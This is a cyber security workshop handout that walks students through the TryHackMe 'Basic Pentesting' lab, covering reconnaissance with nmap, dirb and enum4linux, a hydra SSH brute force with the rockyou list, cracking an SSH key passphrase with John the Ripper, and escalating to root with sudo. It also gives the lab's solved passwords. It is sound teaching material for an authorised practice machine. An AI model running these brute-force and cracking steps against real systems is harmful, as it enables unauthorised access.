Institute of Coding Skills Workshop

Cyber Security - Week 1: Basic Pentesting

The purpose of this task is to introduce you to a practical cyber security exercise. Often, organisations may ask for a “vulnerability assessment”, or a “penetration test” of their systems. A vulnerability assessment is a systematic approach to examining core assets and measuring whether they pose a threat to the organisation against a set of criteria. A penetration test is where an “attacker” will attempt to gain access to a system, and they will document their process for achieving this.

We will work through a basic pentesting exercise on TryHackMe. The aim is to show you the process that a penetration tester may work through, and how a supposedly secure system can be compromised to allow administrative access to an attacker. During our practical session, we will work through the challenge of information gathering, gaining initial access by discovering a vulnerable user account and escalating privilege so that we can have administrative access. Whilst a synthetic example, it is important to reflect on how this kind of attack may work against your own systems. An online video guide is also available: https://youtu.be/Eus1f82BU4o

Task

  1. To begin, please go to http://www.tryhackme.com and sign up for an account.
  2. Go to the room: https://tryhackme.com/room/basicpentestingjt
  3. Click “Start AttackBox” to launch the web-based virtual machine that we will use.
  4. Click “Start Machine” to launch the vulnerable machine that we will attempt to access.
  5. Let’s see what we can find out about our target…

Guide

Stage 1

  • Use nmap <IP_ADDRESS> to identify services running on the machine
  • Access the web server using the browser, check the page source and the comments
  • Use dirb http://<IP_ADDRESS> to identify web directories
  • Gather information from the two text files on the web server
  • Use enum4linux <IP_ADDRESS> to identify user accounts on the machine
  • Use hydra to brute force against the known weak user account, using the rockyou password list: hydra -l jan -P /usr/share/wordlists/rockyou.txt <IP_ADDRESS> ssh
  • Use ssh jan@<IP_ADDRESS> to connect to the machine using the password as discovered (armando)

Stage 2

  • Having gained user access, check whether we have admin privileges: sudo -l
  • Navigate to /home – are there any other users we can try?
  • Within /home/kay there is a file. Show the file using cat pass.bak. We find we are unable to access it.
  • Use uname and cat /etc/issue to find out more information about the system.
  • Look in /home/kay/.ssh – we find that the private key is available
  • Use ssh -i id_rsa kay@localhost – asks us for a passphrase

Stage 3

  • Copy private key to a key_file on our attacking machine – use nano and paste from clipboard.
  • Use /usr/share/john/ssh2john.py key_file > key_hash
  • Use cat key_hash to examine hash output
  • Use /usr/sbin/john key_hash to crack the hash (beeswax)
  • Use ssh -i id_rsa kay@localhost back on the existing ssh connection – use the passphrase you have just found
  • Use cat pass.bak to show the contents of the password backup file.
  • Use sudo -l then enter the password – this user has administrative rights.
  • Use sudo -i
  • Use ls and then cat flag.txt to find the final flag on the machine!

The above steps are also shown in further detail in the online video: https://youtu.be/Eus1f82BU4o

Version: 1.0
Author: Phil Legg
E-mail: Phil.Legg@uwe.ac.uk